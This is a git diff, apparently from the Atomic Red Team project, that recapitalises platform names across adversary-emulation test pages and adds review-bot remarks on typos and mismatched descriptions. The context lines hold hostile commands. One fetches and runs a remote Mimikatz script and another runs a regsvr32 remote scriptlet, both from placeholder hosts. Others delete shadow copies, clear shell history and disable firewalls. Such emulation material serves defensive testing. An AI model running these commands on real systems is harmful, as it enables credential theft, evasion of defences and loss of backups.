diff --git a/atomics/t1002/t1002.md b/atomics/t1002/t1002.md index 3b058a54..68b5e5d6 100644 --- a/atomics/t1002/t1002.md +++ b/atomics/t1002/t1002.md @@ -24,7 +24,7 @@ Requires Network: No ## Atomic Test #1 - Compress Data for Exfiltration With PowerShell TODO -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -43,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} ## Atomic Test #2 - Compress Data for Exfiltration With Rar TODO -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `powershell`! diff --git a/atomics/t1003/t1003.md b/atomics/t1003/t1003.md index 8fd2b6dd..89257bca 100644 --- a/atomics/t1003/t1003.md +++ b/atomics/t1003/t1003.md @@ -153,7 +153,7 @@ Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs ## Atomic Test #1 - Powershell Mimikatz Dumps Credentials via Powershell by invoking a remote mimikatz script -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -171,7 +171,7 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika ## Atomic Test #2 - Gsecdump https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -184,7 +184,7 @@ gsecdump -a ## Atomic Test #3 - Windows Credential Editor http://www.ampliasecurity.com/research/windows-credentials-editor/ -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -198,7 +198,7 @@ wce -o #{output_file} Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! 
diff --git a/atomics/t1046/t1046.md b/atomics/t1046/t1046.md index 70d568e0..034167ec 100644 --- a/atomics/t1046/t1046.md +++ b/atomics/t1046/t1046.md @@ -22,7 +22,7 @@ Permissions Required: User, Administrator, SYSTEM ## Atomic Test #1 - Scan a bunch of ports to see if they are open xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! diff --git a/atomics/t1087/t1087.md b/atomics/t1087/t1087.md index dee692d6..8eb96474 100644 --- a/atomics/t1087/t1087.md +++ b/atomics/t1087/t1087.md @@ -46,7 +46,7 @@ Contributors: Travis Smith, Tripwire ## Atomic Test #1 - List all accounts xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -64,7 +64,7 @@ cat /etc/passwd > #{output_file} ## Atomic Test #2 - View sudoers access xxx (requires root) -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -82,7 +82,7 @@ cat /etc/sudoers > #{output_file} ## Atomic Test #3 - View accounts with UID 0 xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -100,7 +100,7 @@ grep 'x:0:' /etc/passwd > #{output_file} ## Atomic Test #4 - List opened files by user xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -113,7 +113,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ## Atomic Test #5 - Show if a user account has ever logger in remotely xxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! diff --git a/atomics/t1089/t1089.md b/atomics/t1089/t1089.md index 4fc776a7..d34afe4f 100644 --- a/atomics/t1089/t1089.md +++ b/atomics/t1089/t1089.md 
@@ -26,7 +26,7 @@ Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems ## Atomic Test #1 - Disable iptables firewall Disables the iptables firewall -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -48,7 +48,7 @@ fi ## Atomic Test #2 - Disable syslog Disables syslog collection -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -68,7 +68,7 @@ fi ## Atomic Test #3 - Disable Cb Response Disable the Cb Response service -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -88,7 +88,7 @@ fi ## Atomic Test #4 - Disable SELinux Disables SELinux enforcement -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! diff --git a/atomics/t1099/t1099.md b/atomics/t1099/t1099.md index d23c60ab..e314000d 100644 --- a/atomics/t1099/t1099.md +++ b/atomics/t1099/t1099.md @@ -26,7 +26,7 @@ Permissions Required: User, Administrator, SYSTEM ## Atomic Test #1 - Set a file's access timestamp Stomps on the access timestamp of a file -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -44,7 +44,7 @@ touch -a -t 197001010000.00 #{target_filename} ## Atomic Test #2 - Set a file's modification timestamp Stomps on the modification timestamp of a file -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs @@ -65,7 +65,7 @@ Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs diff --git a/atomics/t1105/t1105.md b/atomics/t1105/t1105.md index 3e2fb99b..00436463 100644 --- a/atomics/t1105/t1105.md +++ b/atomics/t1105/t1105.md 
@@ -26,7 +26,7 @@ Requires Network: Yes ## Atomic Test #1 - xxxx xxxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `bash`! diff --git a/atomics/t1107/t1107.md b/atomics/t1107/t1107.md index 36e51aa4..5bd271bd 100644 --- a/atomics/t1107/t1107.md +++ b/atomics/t1107/t1107.md @@ -50,7 +50,7 @@ Contributors: Walker Johnson ## Atomic Test #1 - Victim configuration Create a temporary directory and several files on the victim system for later deletion -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -66,7 +66,7 @@ echo "This file will be shredded" > /tmp/victim-shred.txt ## Atomic Test #2 - Delete a single file Delete a single file from the temporary directory -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -79,7 +79,7 @@ rm -f /tmp/victim-files/a ## Atomic Test #3 - Delete an entire folder Recursively delete the temporary directory and all files contained within it -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -92,7 +92,7 @@ rm -rf /tmp/victim-files ## Atomic Test #4 - Overwrite and delete a file with shred Use the `shred` command to overwrite the temporary file and then delete it -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -105,7 +105,7 @@ shred -u /tmp/victim-shred.txt ## Atomic Test #5 - Victim configuration Create a temporary directory and several files on the victim system for later deletion -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -135,7 +135,7 @@ type nul > g ## Atomic Test #6 - Delete a single file - cmd Delete a single file from the temporary directory using cmd.exe -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! 
@@ -148,7 +148,7 @@ del /f %TEMP%\victim-files-cmd\a ## Atomic Test #7 - Delete an entire folder - cmd Recursively delete the temporary directory and all files contained within it using cmd.exe -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -161,7 +161,7 @@ del /f /S %TEMP%\victim-files-cmd ## Atomic Test #8 - Delete a single file - ps Delete a single file from the temporary directory using Powershell -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `powershell`! @@ -174,7 +174,7 @@ Remove-Item -path %TEMP%\victim-files-ps\a ## Atomic Test #9 - Delete an entire folder - ps Recursively delete the temporary directory and all files contained within it using Powershell -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `powershell`! @@ -187,7 +187,7 @@ Remove-Item -path %TEMP%\victim-files-ps -recurse ## Atomic Test #10 - Delete VSS - vssadmin Delete all volume shadow copies with vssadmin.exe -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -200,7 +200,7 @@ vssadmin.exe Delete Shadows /All /Quiet ## Atomic Test #11 - Delete VSS - wmic Delete all volume shadow copies with wmic -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -213,7 +213,7 @@ wmic shadowcopy delete ## Atomic Test #12 - bcdedit xxx -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -227,7 +227,7 @@ bcdedit /set {default} recoveryenabled no ## Atomic Test #13 - wbadmin xxx -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! diff --git a/atomics/t1110/t1110.md b/atomics/t1110/t1110.md index d34c8aa5..66af0b58 100644 --- a/atomics/t1110/t1110.md +++ b/atomics/t1110/t1110.md 
@@ -32,7 +32,7 @@ Contributors: John Strand ## Atomic Test #1 - Brute Force Credentials Creates username and password files then attempts to brute force on remote host -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs diff --git a/atomics/t1113/t1113.md b/atomics/t1113/t1113.md index ace23e44..eaa98b79 100644 --- a/atomics/t1113/t1113.md +++ b/atomics/t1113/t1113.md @@ -32,7 +32,7 @@ Data Sources: API monitoring, Process monitoring, File monitoring ## Atomic Test #1 - Screencapture Use screencapture command to collect a full desktop screenshot -**Supported Platforms:** macos +**Supported Platforms:** macOS #### Inputs @@ -51,7 +51,7 @@ screencapture ## Atomic Test #2 - Screencapture (silent) Use screencapture command to collect a full desktop screenshot -**Supported Platforms:** macos +**Supported Platforms:** macOS #### Inputs @@ -70,7 +70,7 @@ screencapture -x ## Atomic Test #3 - X Windows Capture Use xwd command to collect a full desktop screenshot and review file with xwud -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Inputs @@ -90,7 +90,7 @@ xwud -in #{output_file} ## Atomic Test #4 - Import Use import command to collect a full desktop screenshot -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Inputs diff --git a/atomics/t1115/t1115.md b/atomics/t1115/t1115.md index d77cef2d..23206251 100644 --- a/atomics/t1115/t1115.md +++ b/atomics/t1115/t1115.md @@ -28,7 +28,7 @@ Data Sources: API monitoring ## Atomic Test #1 - Utilize Clipboard to store or execute commands from Add data to clipboard to copy off or execute commands from. -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! @@ -42,7 +42,7 @@ clip < readme.txt ## Atomic Test #2 - PowerShell Utilize PowerShell to echo a command to clipboard and execute it -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `powershell`! 
diff --git a/atomics/t1117/t1117.md b/atomics/t1117/t1117.md index 9413c3c8..562a4455 100644 --- a/atomics/t1117/t1117.md +++ b/atomics/t1117/t1117.md @@ -36,7 +36,7 @@ Contributors: Casey Smith ## Atomic Test #1 - Regsvr32 local COM scriptlet execution Regsvr32.exe is a command-line program used to register and unregister OLE controls -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -54,7 +54,7 @@ regsvr32.exe /s /u /i:#(unknown) scrobj.dll ## Atomic Test #2 - Regsvr32 remote COM scriptlet execution Regsvr32.exe is a command-line program used to register and unregister OLE controls -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -72,7 +72,7 @@ regsvr32.exe /s /u /i:#{url} scrobj.dll ## Atomic Test #3 - Regsvr32 local DLL execution Regsvr32.exe is a command-line program used to register and unregister OLE controls -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md index 2de8ec35..fc792f9e 100644 --- a/atomics/t1123/t1123.md +++ b/atomics/t1123/t1123.md @@ -26,7 +26,7 @@ Permissions Required: User ## Atomic Test #1 - SourceRecorder via Windows command prompt Create a file called test.wma, with the duration of 30 seconds -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs @@ -45,7 +45,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} ## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Run it with `command_prompt`! diff --git a/atomics/t1127/t1127.md b/atomics/t1127/t1127.md index d3ae3820..47678f69 100644 --- a/atomics/t1127/t1127.md +++ b/atomics/t1127/t1127.md 
@@ -64,17 +64,16 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward ## Atomic Test #1 - MSBuild Bypass Using Inline Tasks Executes the code in a project file using. C# Example -**Supported Platforms:** windows +**Supported Platforms:** Windows #### Inputs | Name | Description | Type | Default Value | -|-------------------------------------------| - | filename | Location of the project file | Path | T1127.csproj| +|------|-------------|------|---------------| +| filename | Location of the project file | Path | T1127.csproj| #### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe T1127.csproj - ```
diff --git a/atomics/t1130/t1130.md b/atomics/t1130/t1130.md index 2f7798e1..8b991777 100644 --- a/atomics/t1130/t1130.md +++ b/atomics/t1130/t1130.md @@ -42,7 +42,7 @@ Contributors: Itzik Kotler, SafeBreach, Travis Smith, Tripwire, Red Canary, Matt ## Atomic Test #1 - Install root CA on CentOS/RHEL Creates a root CA with openssl -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! diff --git a/atomics/t1136/t1136.md b/atomics/t1136/t1136.md index 57959349..34004b92 100644 --- a/atomics/t1136/t1136.md +++ b/atomics/t1136/t1136.md @@ -24,7 +24,7 @@ Permissions Required: Administrator ## Atomic Test #1 - Create a user account on a Linux system Create a user via useradd -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Inputs @@ -43,7 +43,7 @@ useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} ## Atomic Test #2 - Create a user account on a MacOS system Creates a user on a MacOS system with dscl -**Supported Platforms:** macos +**Supported Platforms:** macOS #### Run it with `bash`! diff --git a/atomics/t1139/t1139.md b/atomics/t1139/t1139.md index 4bc58acc..5021a4db 100644 --- a/atomics/t1139/t1139.md +++ b/atomics/t1139/t1139.md @@ -20,7 +20,7 @@ Permissions Required: User ## Atomic Test #1 - xxxx xxxx -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs diff --git a/atomics/t1146/t1146.md b/atomics/t1146/t1146.md index 0cd9cb4a..2f85ee1a 100644 --- a/atomics/t1146/t1146.md +++ b/atomics/t1146/t1146.md @@ -32,7 +32,7 @@ Permissions Required: User ## Atomic Test #1 - Clear Bash history (rm) Clears bash history via rm -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -45,7 +45,7 @@ rm ~/.bash_history ## Atomic Test #2 - Clear Bash history (echo) Clears bash history via rm -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! 
@@ -58,7 +58,7 @@ echo "" > ~/.bash_history ## Atomic Test #3 - Clear Bash history (cat dev/null) Clears bash history via cat /dev/null -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -71,7 +71,7 @@ cat /dev/null > ~/.bash_history ## Atomic Test #4 - Clear Bash history (ln dev/null) Clears bash history via a symlink to /dev/null -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! @@ -84,7 +84,7 @@ ln -sf /dev/null ~/.bash_history ## Atomic Test #5 - Clear Bash history (truncate) Clears bash history via truncate -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! @@ -97,7 +97,7 @@ truncate -s0 ~/.bash_history ## Atomic Test #6 - Clear history of a bunch of shells Clears the history of a bunch of different shell types by setting the history size to zero -**Supported Platforms:** linux +**Supported Platforms:** Linux #### Run it with `sh`! diff --git a/atomics/t1148/t1148.md b/atomics/t1148/t1148.md index ff901f7a..35d5e1e5 100644 --- a/atomics/t1148/t1148.md +++ b/atomics/t1148/t1148.md @@ -22,7 +22,7 @@ Permissions Required: User ## Atomic Test #1 - Disable history collection Disables history collection in shells -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Inputs diff --git a/atomics/t1158/t1158.md b/atomics/t1158/t1158.md index a7162d95..bf91fa4e 100644 --- a/atomics/t1158/t1158.md +++ b/atomics/t1158/t1158.md @@ -37,7 +37,7 @@ Permissions Required: User ## Atomic Test #1 - Create a hidden file in a hidden directory Creates a hidden file inside a hidden directory -**Supported Platforms:** linux, macos +**Supported Platforms:** Linux, macOS #### Run it with `sh`! diff --git a/atomics/t1176/t1176.md b/atomics/t1176/t1176.md index 545f0f1f..315e4510 100644 --- a/atomics/t1176/t1176.md +++ b/atomics/t1176/t1176.md 
@@ -30,7 +30,7 @@ Contributors: Justin Warner, ICEBRG ## Atomic Test #1 - Chrome (Developer Mode) xxx -**Supported Platforms:** linux, windows, macos +**Supported Platforms:** Linux, Windows, macOS #### Run it with these steps! @@ -49,7 +49,7 @@ tick 'Developer Mode'. ## Atomic Test #2 - Chrome (Chrome Web Store) xxx -**Supported Platforms:** linux, windows, macos +**Supported Platforms:** Linux, Windows, macOS #### Run it with these steps! @@ -65,7 +65,7 @@ in Chrome ## Atomic Test #3 - Firefox Create a file called test.wma, with the duration of 30 seconds -**Supported Platforms:** linux, windows, macos +**Supported Platforms:** Linux, Windows, macOS #### Run it with these steps!
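Review bot: the two `atomics/t1002/t1002.md` hunks leave the bare `TODO` description in place for both "Compress Data for Exfiltration" tests, one line above each `**Supported Platforms:**` line being edited; since this pass already touches those spots, replacing the placeholder with a one-line description of what the `Compress-Archive` and Rar commands do would avoid a second edit. The same `xxx`/`xxxx` placeholder descriptions recur in the T1046, T1087, T1105, T1107 (#12, #13), T1139 and T1176 hunks. If these `.md` files are rendered from a companion spec, the platform-name casing should be changed there as well so a regeneration does not revert it.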
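Review bot: casing is left inconsistent for the tool name in the `atomics/t1003/t1003.md` hunk for Atomic Test #1, whose title reads "Powershell Mimikatz" and whose description reads "via Powershell", while the T1002 hunk in the same patch spells it "PowerShell". A patch whose purpose is normalising capitalisation should settle on "PowerShell" here too.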
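Review bot: typo in the title carried as context in the `atomics/t1087/t1087.md` hunk for Atomic Test #5, "Show if a user account has ever logger in remotely"; it should read "logged in".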
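Review bot: the command shown in the hunk header for `atomics/t1107/t1107.md` Atomic Test #7, `del /f /S %TEMP%\victim-files-cmd`, does not match its description "Recursively delete the temporary directory": `del` removes files inside the tree but never the directory itself. Either the description should say it deletes the files, or the command should use `rmdir /S /Q %TEMP%\victim-files-cmd`.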
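Review bot: the `atomics/t1107/t1107.md` hunks for Atomic Tests #8 and #9 are run with `powershell`, yet the context commands `Remove-Item -path %TEMP%\victim-files-ps\a` and `Remove-Item -path %TEMP%\victim-files-ps -recurse` use cmd.exe's `%TEMP%` syntax, which PowerShell does not expand, so the test targets a literal `%TEMP%` path; `$env:TEMP` is the PowerShell equivalent. Both descriptions also spell the shell "Powershell" where the rest of the patch uses "PowerShell".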
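Review bot: the hunk header for `atomics/t1117/t1117.md` Atomic Test #1 shows `regsvr32.exe /s /u /i:#(unknown) scrobj.dll`, where `#(unknown)` does not follow the `#{name}` input-substitution form used by the next hunk (`#{url}`) and by the test's own Inputs table; it looks like a broken reference to the local scriptlet input and will not be substituted at run time.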
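Review bot: the title carried in the `atomics/t1123/t1123.md` hunk for Atomic Test #1 reads "SourceRecorder via Windows command prompt", but the command in the following hunk header is `SoundRecorder /FILE ...`; the title should say "SoundRecorder".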
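Review bot: the `atomics/t1127/t1127.md` hunk is the one substantive fix in this patch and is correct: the old Inputs table had a single-cell separator row (`|-------------------------------------------| - |`) that would not render as a four-column table, and the replacement `|------|-------------|------|---------------|` matches the header; dropping the stray blank line before the closing fence also keeps the code block tidy. While here, the description "Executes the code in a project file using. C# Example" has a misplaced period and should read something like "Executes the code in a project file using inline tasks (C# example)".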
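Review bot: the `atomics/t1136/t1136.md` hunk for Atomic Test #2 changes the platform line to "macOS" but leaves "MacOS" in the title "Create a user account on a MacOS system" and the description "Creates a user on a MacOS system with dscl" two lines above; update those too for the consistency this patch is after.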
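Review bot: the `atomics/t1146/t1146.md` hunk for Atomic Test #2 "Clear Bash history (echo)" still carries the description "Clears bash history via rm", copied from Test #1; the following hunk header shows the actual command is `echo "" > ~/.bash_history`, so the description should say "via echo".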
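Review bot: the `atomics/t1176/t1176.md` hunk for Atomic Test #3 "Firefox" carries the description "Create a file called test.wma, with the duration of 30 seconds", which is the SoundRecorder text from T1123 and has nothing to do with a browser-extension test; it should describe the Firefox extension steps that follow.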